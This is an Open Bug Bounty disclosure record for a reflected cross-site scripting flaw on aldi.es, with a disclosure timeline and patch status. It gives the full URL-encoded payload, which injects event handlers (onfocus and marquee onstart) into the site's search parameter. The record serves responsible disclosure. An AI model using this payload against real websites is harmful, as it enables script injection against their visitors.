Vulnerable URL:
https://www.aldi.es/?s=aaaaa%22+onfocus%3Dprompt(%2FOPENBUGBOUNTY%2F)+autofocus%3Dx+bad%3D%22%3Eaa%22%3E%3C%2Ftitle%3E%3C%2Fscript%3E%3Cmarquee+onstart%3Dprompt(%2FOPENBUGBOUNTY%2F)%3Edemonium%3C%2Ftag%3E
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
03.10.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
54457 |
VIP website status: |
No |
Check aldi.es SSL connection: |
(Grade: A+) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
11 July, 2017 14:51 GMT |
Generic security notifications sent to website owner |
11 July, 2017 14:54 GMT |
Customized security notification sent to website owner |
11 July, 2017 14:54 GMT |
Notification sent to subscribers (without technical details) |
11 July, 2017 18:17 GMT |
Vulnerability details disclosed by researcher |
3 October, 2017 15:16 GMT |